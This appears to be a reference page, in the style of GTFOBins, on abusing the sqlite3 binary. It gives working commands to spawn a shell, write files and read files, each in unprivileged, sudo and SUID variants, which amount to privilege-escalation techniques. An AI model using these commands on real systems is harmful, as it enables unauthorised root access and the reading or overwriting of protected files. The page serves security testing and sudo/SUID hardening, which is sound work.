.. / sqlite3

Sponsor Fork Star

• Shell
• File write
• File read

Shell

This executable can spawn an interactive system shell.

• Unprivileged

  This function can be performed by any unprivileged user.

  sqlite3 /dev/null '.shell /bin/sh'

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  sqlite3 /dev/null '.shell /bin/sh'

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  Remarks

  This executable runs commands using the system shell, e.g., via functions like system, so it only works for distributions where the shell does not drop SUID privileges.

  sqlite3 /dev/null '.shell /bin/sh'

File write

This executable can write data to local files.

• Unprivileged

  This function can be performed by any unprivileged user.

  sqlite3 /dev/null -cmd ".output /path/to/output-file" 'select "DATA";'

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  sqlite3 /dev/null -cmd ".output /path/to/output-file" 'select "DATA";'

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  sqlite3 /dev/null -cmd ".output /path/to/output-file" 'select "DATA";'

  Remarks

  The content is corrupted or otherwise altered by the process, thus it might not be suitable for handling arbitrary binary data.

File read

This executable can read data from local files.

• Unprivileged

  This function can be performed by any unprivileged user.

  sqlite3 <<EOF
  CREATE TABLE x(x TEXT);
  .import /path/to/input-file x
  SELECT * FROM x;
  EOF

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  sqlite3 <<EOF
  CREATE TABLE x(x TEXT);
  .import /path/to/input-file x
  SELECT * FROM x;
  EOF

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  sqlite3 <<EOF
  CREATE TABLE x(x TEXT);
  .import /path/to/input-file x
  SELECT * FROM x;
  EOF

  Remarks

  The content is corrupted or otherwise altered by the process, thus it might not be suitable for handling arbitrary binary data.

Source | History